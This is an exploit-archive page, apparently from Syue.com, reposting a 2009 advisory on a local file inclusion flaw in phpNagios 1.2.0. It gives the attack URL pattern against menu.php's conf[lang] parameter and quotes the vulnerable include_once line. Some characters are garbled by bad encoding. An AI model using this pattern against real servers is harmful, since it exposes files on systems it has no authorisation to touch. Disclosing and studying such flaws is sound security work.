[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpNagios 1.2.0 (menu.php) Local File Inclusion Vulnerability
# Published : 2009-09-09
# Author : CoBRa_21
# Previous Title : Mambo Component com_hestar Remote SQL Injection Vulnerability
# Next Title : ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability
-------------------------------------------------------------------------------------
phpNagios v 1.2.0 (menu.php) LFI Vulnerability
-------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu[at]windowslive[dot]com
Script Download: http://sourceforge.net/projects/phpnagios/
-------------------------------------------------------------------------------------
EXPLO?°T:
http://localhost/[PATH]/menu.php?conf[lang]= [LF?°]
-------------------------------------------------------------------------------------
BUG
Line 28: include_once("lib/lang/".$conf['lang']."/menu.php");
-------------------------------------------------------------------------------------
# www.Syue.com [2009-09-09]